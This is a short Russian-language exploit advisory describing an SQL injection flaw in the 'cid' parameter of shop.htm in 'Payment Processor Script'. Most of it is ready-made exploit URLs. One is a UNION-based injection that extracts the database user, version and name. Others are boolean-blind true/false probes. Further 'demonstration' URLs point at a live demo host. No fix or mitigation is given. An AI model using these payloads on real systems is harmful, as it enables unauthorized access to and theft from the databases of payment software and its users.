Программа: Payment Processor Script
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cid» сценарием shop.htm. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
R-Sql
http://z0rlu.blogspot.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
Демонстрация:
http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
B-Sql
http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=1 true
http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=100 false
Демонстрация:
http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1
http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100
